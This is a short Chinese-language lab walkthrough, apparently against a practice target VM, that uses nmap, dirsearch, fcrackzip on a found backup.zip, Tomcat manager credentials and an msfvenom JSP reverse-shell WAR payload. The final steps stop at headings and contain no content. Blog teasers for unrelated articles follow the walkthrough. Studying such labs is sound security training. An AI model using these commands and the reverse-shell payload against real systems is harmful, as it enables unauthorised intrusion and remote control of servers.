1.用kali作为攻击机

查找靶机的ip

kaili和靶机都设为NAT模式

nmap -sn 192.168.51.0/24

2.扫描端口

nmap -p- 192.168.51.130

3.访问端口

80

8080

3.扫目录

dirsearch -u http://192.168.51.130

没用

dirsearch -u http://192.168.51.130:8080

发现了两个可能有用的信息,分别访问

readme.txt

backup.zip

4.解压backup.zip

需要密码,破解一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

密码是@administrator_hi5

cat tomcat-users.xml

username="manager" password="melehifokivai"

username="admin" password="melehifokivai"

5.登录

发现可以部署war文件

6.制作war文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.51.130" LPORT=8888 -f war > jsp_java.war

7.访问

8.开启监听

# linux # 运维 # 服务器
Logo
2048 AI社区

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐

AI+零信任:下一代数据安全智能体的架构演进

在当今数字化时代,数据安全面临着前所未有的挑战。传统的数据安全防护体系已经难以应对日益复杂多变的安全威胁。AI(人工智能)与零信任理念的结合为数据安全带来了新的思路和解决方案,催生出下一代数据安全智能体。本文将深入探讨AI与零信任结合的架构演进,从核心概念、原理、具体实现,到实际应用场景、面临的挑战和未来发展趋势等方面进行全面分析,旨在帮助开发者和安全从业者深入理解这一新兴领域。

avatar 2048 AI社区

探索Nginx:深入理解Nginx基础组件的使用

Nginx的每个进程内部都有一个自己的ngx_cycle。展开代码语言:C自动换行AI代码解释void *tag;*/ };

avatar 2048 AI社区

提示工程架构师必看:Agentic AI 的6个未来技术突破点

工具元数据描述:用结构化语言定义工具的功能、输入输出、依赖关系,比如:{"工具名称": "物流API","功能描述": "查询快递的实时状态","输入参数": ["订单号"],"输出参数": ["快递位置", "预计到达时间"],"依赖工具": []规划引导prompt:让Agent理解「如何根据任务目标规划工具链」,比如:“你需要处理用户的问题:{用户问题}。首先,拆解任务目标为多个子任务;然后

avatar 2048 AI社区